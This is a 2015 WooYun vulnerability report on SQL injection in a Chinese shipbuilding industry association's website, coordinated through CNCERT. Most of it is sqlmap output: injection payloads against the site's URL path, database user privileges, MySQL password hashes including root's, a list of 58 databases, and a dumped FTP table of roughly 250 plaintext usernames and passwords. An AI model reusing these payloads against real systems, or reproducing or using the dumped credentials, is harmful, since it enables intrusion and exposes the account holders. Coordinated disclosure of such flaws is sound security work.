当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136167

漏洞标题:中国船舶工业行业协会伪静态sql注入

相关厂商:cncert国家互联网应急中心

漏洞作者: Eric_zZ

提交时间:2015-08-25 15:22

修复时间:2015-10-10 20:06

公开时间:2015-10-10 20:06

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-25: 细节已通知厂商并且等待厂商处理中
2015-08-26: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开

简要描述:

详细说明:

**.**.**.**/index.php/Information/detail/id/232*.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71


Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://**.**.**.**:80/index.php/Information/detail/id/232) AND 3632=3632 AND (6265=6265.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71
    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: http://**.**.**.**:80/index.php/Information/detail/id/-1506) UNION ALL SELECT NULL,CONCAT(0x7165756b71,0x444e4f43704a46615465,0x71656b7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://**.**.**.**:80/index.php/Information/detail/id/232) AND SLEEP(5) AND (4657=4657.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71
---
[22:01:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.6
back-end DBMS: MySQL 5.0.11


OK,注入出来啦,可以爆的都爆一下。

database management system users privileges:                                   
[*] 'camarine'@'localhost' [5]:
    privilege: DELETE
    privilege: FILE
    privilege: INSERT
    privilege: SELECT
    privilege: UPDATE
[*] 'chinaswsftproot'@'localhost' [1]:
    privilege: USAGE
[*] 'cssc2013test'@'localhost' [1]:
    privilege: USAGE
[*] 'haiguan'@'%' [5]:
    privilege: DELETE
    privilege: FILE
    privilege: INSERT
    privilege: SELECT
    privilege: UPDATE
[*] 'jnhr'@'localhost' [4]:
    privilege: DELETE
    privilege: INSERT
    privilege: SELECT
    privilege: UPDATE
[*] 'jzshipyard'@'localhost' [1]:
    privilege: USAGE
[*] 'ppship'@'localhost' [1]:
    privilege: USAGE
[*] 'root'@'**.**.**.**' (administrator) [25]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: UPDATE
[*] 'root'@'localhost' (administrator) [25]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: UPDATE
[*] 'root'@'myweb' (administrator) [25]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: UPDATE
[*] 'safe'@'%' [5]:
    privilege: DELETE
    privilege: FILE
    privilege: INSERT
    privilege: SELECT
    privilege: UPDATE
[*] 'sem'@'localhost' [1]:
    privilege: USAGE
[*] 'ship_news'@'localhost' [5]:
    privilege: DELETE
    privilege: FILE
    privilege: INSERT
    privilege: SELECT
    privilege: UPDATE
[*] 'snm'@'localhost' [1]:
    privilege: USAGE
[*] 'webgroups'@'localhost' [1]:
    privilege: USAGE


[22:03:38] [INFO] fetching current user
current user:    'root@localhost'
[22:03:38] [INFO] fetching current database
current database:    'hyxh2015'
[22:03:39] [INFO] testing if current user is DBA
[22:03:39] [INFO] fetching current user
current user is DBA:    True


database management system users password hashes:
[*] camarine [1]:
    password hash: *DC7EFD837AC582C89495EEB9A151551990123587
[*] chinaswsftproot [1]:
    password hash: *195C522FD075434029DBE1802248E960D9BAE5D1
[*] cssc2013test [1]:
    password hash: *7E2E5DEC0B7F78DF8E7DE58F443946B590C3F8EF
[*] haiguan [1]:
    password hash: *1D4C1F5D816E2615855960950EA2E89137CC9122
[*] jnhr [1]:
    password hash: *D58A30681E3BD72168A55066128F55C09787F8CB
[*] jzshipyard [1]:
    password hash: *98DC96620A8995520AE77F00E09377696460BD55
[*] ppship [1]:
    password hash: *371CE96874B45FF9696D6A318410CAD28C2CC6A2
[*] root [2]:
    password hash: *83DD22310DC886D501A708D45688B9A3CFAB0138
    password hash: *A889171F7E4E2E8329F7AAE374FF2E6ACB5748B7
[*] safe [1]:
    password hash: *C9F948E5C5D874A5662335DDBAEA44A60BE2CA50
[*] sem [1]:
    password hash: *3CEB3C4C2C6397298255016F6C5131CF25998C00
[*] ship_news [1]:
    password hash: *55ECE92BF1801C26152BD69F3473FAB1CA4EE1DF
[*] snm [1]:
    password hash: *E6C21ED59FE6A4C4940BDA05B115D3DCD5798CFB
[*] webgroups [1]:
    password hash: *191E6263C8FAE53513E8C084453D6029F1890E12


available databases [58]:                                                      
[*] action1
[*] auser_hbeg
[*] bugfree
[*] camarine
[*] cdcol
[*] chinasws2014
[*] chinasws2014_cn
[*] chinaswsftp
[*] csit2014
[*] csit2410_new
[*] cssc2013entest
[*] cssc2013test
[*] cssc_jnzc150
[*] dbtest
[*] ftp
[*] guest_dbs
[*] haiguan
[*] haiguant
[*] hyxh2015
[*] information_nw
[*] information_schema
[*] jnhr
[*] jy
[*] jydiscuz2
[*] material
[*] mysql
[*] phpcms
[*] phpcms_d
[*] phpcms_m
[*] phpcms_n
[*] ppship
[*] safemanage
[*] sem
[*] ship_news
[*] ship_news_1
[*] technology
[*] technologydl
[*] technologydl1
[*] technologydl1_cn
[*] technologydl_cn
[*] test
[*] web_bjhyjs
[*] web_hh
[*] web_hh_en
[*] web_huahai_en
[*] web_old_sh_shipyard
[*] web_waxc
[*] web_wuhu
[*] web_wuhu_en
[*] webgroups_chinasws
[*] webgroups_cstc
[*] webgroups_cstc_e
[*] webgroups_cstc_e_2014test
[*] webgroups_jxjz
[*] webgroups_snm
[*] webgroups_snm_en
[*] wuhu
[*] wuhu_en


此处,58个数据库,这么多敏感信息,而且竟然有个ftp,果断爆它。

Database: ftp
Table: user
[400 entries]
+------------+-------------+
| username   | password    |
+------------+-------------+
| hhm-dc     | dc1465      |
| hhm-plks   | plks6514    |
| hhm-yge    | yge6354     |
| hhm-cc     | cc4596      |
| hhm-shsh   | shsh8547    |
| hhm-sl     | sl8752      |
| hhm-xm     | xm4564      |
| hhm-kw     | kw7841      |
| hhm-tx     | tx5465      |
| hhm-zc     | zc1005      |
| hhm-ryh    | ryh6546     |
| hhm-ml     | ml0204      |
| hhm-ms     | ms5401      |
| hhm-ljdq   | ljdq5302    |
| hhm-komet  | komet4923   |
| hhm-jd     | jd4553      |
| hhm-bs     | bs6565      |
| hhm-dljc   | dljc5464    |
| hhm-knfs   | knfs6346    |
| hhm-cd     | cd2584      |
| hhm-sd     | sd1285      |
| hhm-zr     | zr2125      |
| hhm-lhjh   | lhjh0236    |
| hhm-bzjl   | bzjl2554    |
| hhm-jlsy   | jlsy5266    |
| hhm-qd     | qd6952      |
| hhm-db     | db3265      |
| hhm-fed    | fed1321     |
| hhm-jytw   | jytw6521    |
| hhm-lf     | lf2106      |
| hhm-qg     | qg8752      |
| hhm-xxgm   | xxgm0548    |
| hhm-yxtz   | yxtz5812    |
| hhm-yl     | yl9822      |
| hhm-zlth   | zlth8754    |
| hhm-az     | az5225      |
| hhm-jel    | jel5854     |
| hhm-hst    | hst6234     |
| hhm-sljx   | sljx5667    |
| hhm-jo     | jo2130      |
| hhm-kh     | kh6654      |
| hhm-wl     | <blank>     |
| hhm-yh     | yh3216      |
| hhm-zs     | zs6545      |
| hhm-zxxs   | zxxs9872    |
| hhm-yq     | yq5054      |
| hhm-jlzz   | jlzz5458    |
| hhm-hf     | hf8983      |
| hhm-fr     | fr5045      |
| hhm-cj     | cj7446      |
| hhm-jw     | jw5545      |
| hhm-klk    | klk5215     |
| hhm-mg     | mg3638      |
| hhm-ntcb   | ntcb3511    |
| hhm-nthh   | nthh1697    |
| hhm-tlzg   | tlzg0687    |
| hhm-rc     | rc0688      |
| hhm-sj     | sj9663      |
| hhm-shxx   | shxx8686    |
| hhm-xyjd   | xyjd8696    |
| hhm-cgst   | cgst8018    |
| hhm-yhgm   | yhgm4923    |
| hhm-clx    | clx9815     |
| zhongshe   | zhongshe123 |
| hhm-awc    | awc5454     |
| hhm-yhcb   | yhcb6561    |
| hhm-mts    | mts1225     |
| hhm-bx     | bx6544      |
| hhm-jysm   | jysm8721    |
| hhm-yljs   | yljs1221    |
| hhm-zzscl  | zzscl4556   |
| hhm-zj     | zj2332      |
| hhm-zsdl   | zsdl5689    |
| hhm-hgd    | hgd3233     |
| hhm-dbrx   | dbrx4598    |
| hhm-hkjd   | hkjd2121    |
| hhm-mwsb   | mwsb5454    |
| hhm-ffdq   | ffdq5346    |
| hhm-thgj   | thgj6654    |
| hhm-jdgzq  | jdgzq2312   |
| hhm-yfjx   | yfjx3213    |
| hhm-kymy   | kymy6545    |
| hhm-wydq   | wydq2165    |
| hhm-cmd    | cmd6549     |
| hhm-htpj   | htpj5468    |
| hhm-jlc    | jlc5217     |
| hhm-shhx   | shhx0541    |
| hhm-dy     | dy6518      |
| hhm-lcmy   | lcmy6563    |
| hhm-rr     | rr2136      |
| hhm-tl     | tl5245      |
| hhm-cxd    | cxd5654     |
| hhm-jshy   | jshy5752    |
| hhm-jbby   | jbby0246    |
| hhm-jlsj   | jlsj2872    |
| hhm-dp     | dp0465      |
| hhm-hb     | hb5268      |
| hhm-shhz   | shhz2188    |
| hhm-shzs   | shzs6384    |
| hhm-xad    | xad2887     |
| hhm-sdy    | sdy2046     |
| hhm-xz     | xz4684      |
| hhm-rm     | rm6532      |
| hhm-zy     | zy9832      |
| hhm-yycb   | yycb5478    |
| hhm-bh     | bh2154      |
| hhm-hybf   | hybf2468    |
| hhm-whxsj  | whxsj1122   |
| hhm-zxth   | zxth1212    |
| hhm-tydz   | tydz3434    |
| hhm-lygl   | lygl3344    |
| hhm-jbsy   | jbsy5656    |
| hhm-fd     | fd5566      |
| hhm-dq     | dq6655      |
| hhm-bn     | bn6565      |
| hhm-bdzg   | bdzg7788    |
| hhm-nhzn   | nhzn8787    |
| hhm-yscb   | yscb7878    |
| hhm-pldz   | pldz8877    |
| hhm-sfwl   | sfwl7778    |
| hhm-sda    | sda8887     |
| hhm-xelt   | xelt8777    |
| hhm-bjzc   | bjzc3939    |
| hhm-jsjy   | jsjy9393    |
| hhm-dlcy   | dlcy2828    |
| hhm-jshd   | jshd8282    |
| hhm-shjc   | shjc3399    |
| hhm-shmh   | shmh9933    |
| hhm-zgsy   | zgsy3939    |
| hhm-gzwj   | gzwj1201    |
| hhm-ksxf   | ksxf1202    |
| hhm-wssy   | wssy1203    |
| hhm-cgklp  | cgklp1204   |
| hhm-cjsy   | cjsy1205    |
| hhm-fgyq   | fgyq1206    |
| hhm-hks    | hks1207     |
| hhm-nlgm   | nlgm1208    |
| hhm-sqdz   | sqdz1210    |
| hhm-xcdq   | xcdq1211    |
| hhm-zznl   | zznl1212    |
| hhm-shsn   | shsn1209    |
| hhm-dykj   | dykj1213    |
| hhm-megyl  | megyl1214   |
| hhm-dycb   | dycb1215    |
| hhm-zjcb   | zjcb1216    |
| hhm-bskj   | bskj1217    |
| hhm-cshz   | cshz1218    |
| hhm-jszm   | jszm1219    |
| hhm-dhlz   | dhlz1220    |
| hhm-dgzd   | dgzd1221    |
| hhm-kyjd   | kyjd1222    |
| hhm-tyfdj  | tyfdj1223   |
| hhm-ydjf   | ydjf1224    |
| hhm-hksk   | hksk1225    |
| hhm-qsl    | qsl1226     |
| hhm-lksl   | lksl1227    |
| hhm-taswd  | taswd1228   |
| hhm-ctwl   | ctwl1229    |
| hhm-cxrj   | cxrj1230    |
| hhm-mlzk   | mlzk1231    |
| hhm-nok    | nok0101     |
| hhm-ksjj   | ksjj0102    |
| hhm-dad    | dad0103     |
| hhm-mhjd   | mhjd0104    |
| hhm-dllt   | dllt0105    |
| hhm-tddl   | tddl0106    |
| hhm-stbsh  | stbsh0107   |
| hhm-ssjd   | ssjd0108    |
| hhm-remy   | remy0109    |
| hhm-syjc   | syjc0110    |
| hhm-wxly   | wlxy0111    |
| hhm-glsz   | glsz0112    |
| hhm-jwhr   | jwhr0113    |
| hhm-hjjx   | hjjx0114    |
| hhm-bmrj   | bmrj0201    |
| hhm-cbys   | cbys0202    |
| hhm-jnyy   | jnyy0203    |
| hhm-zymy   | zymy0204    |
| hhm-zwl    | zwl0205     |
| hhm-stm    | stm0206     |
| hhm-jya    | jya0207     |
| hhm-hldq   | hldq0208    |
| hhm-shhq   | shhq123     |
| hhm-SHEPK  | shepk123    |
| hhm-SHGZCB | shgzcb123   |
| hhm-CQJZ   | cqjz123     |
| hhm-JGS    | jgs123      |
| hhm-SHKL   | shkl123     |
| hhm-SHSZ   | shsz123     |
| hhm-SHSJ   | shsj123     |
| hhm-SHGJ   | shgj123     |
| hhm-711    | 711123      |
| hhm-czsl   | czsl123     |
| hhm-njdn   | njdn123     |
| hhm-njhbsr | njhbsr123   |
| hhm-shgst  | shgst123    |
| hhm-shsy   | shsy123     |
| hhm-jsac   | jsac123     |
| hhm-shhf   | shhf123     |
| hhm-shsf   | shsf123     |
| hhm-shzy   | shzy123     |
| hhm-czflt  | czflt123    |
| hhm-hfra   | hfra123     |
| hhm-njky   | njky123     |
| hhm-shdp   | shdp123     |
| hhm-shht   | shht123     |
| hhm-shkwx  | shkwx123    |
| hhm-czck   | czck123     |
| hhm-hzhc   | hzhc123     |
| hhm-njgc   | njgc123     |
| hhm-szxd   | szxd123     |
| hhm-wdwd   | wdwd12      |
| hhm-sxzs   | sxzs123     |
| hhm-shgg   | shgg123     |
| hhm-scjs   | scjs123     |
| hhm-hydz   | hydz123     |
| hhm-htkq   | htkq123     |
| hhm-shzb   | shzb123     |
| hhm-bsplks | bsplks123   |
| hhm-mggj   | mggj123     |
| hhm-rhcb   | rhcb123     |
| hhm-xxkz   | xxkz        |
| hhm-wrt    | wrt123      |
| hhm-ef     | ef123       |
| hhm-df     | df123       |
| hhm-jydl   | jydl123     |
| hhm-tn     | tn123       |
| hhm-zgshsh | zgshsh123   |
| hhm-fqn    | fqn123      |
| hhm-bsxx   | bsxx123     |
| hhm-jj     | jj123       |
| hhm-sc     | sc123       |
| hhm-ty     | ty123       |
| hhm-wz     | wz123       |
| hhm-hsflks | hsflks123   |
| hhm-lp     | lp123       |
| hhm-aszy   | aszy123     |
| hhm-ddwy   | ddwy123     |
| hhm-dgdl   | dgdl123     |
| hhm-xacb   | xacb123     |
| hhm-hdk    | hdk123      |
| hhm-jezl   | jezl123     |
| hhm-nh     | nh123       |
| hhm-xzkc   | xzkc123     |
| hhm-rp     | rp123       |
| hhm-xg     | xg123       |
| hhm-znql   | znql123     |
| hhm-nek    | nek123      |
| hhm-zyth   | zyth123     |
| hhm-jne    | jne123      |
| hhm-wtq    | wtq123      |
| hhm-12s    | 12s123      |
| hhm-cz     | cz123       |
| hhm-aty    | aty123      |
| hhm-hcjd   | hcjd123     |
| hhm-scyq   | scyq123     |
+------------+-------------+


400个,感觉好腻害的样子。
OK,先这样。

漏洞证明:

同上。

修复方案:

你们专业。

版权声明:转载请注明来源 Eric_zZ@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-26 20:05

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论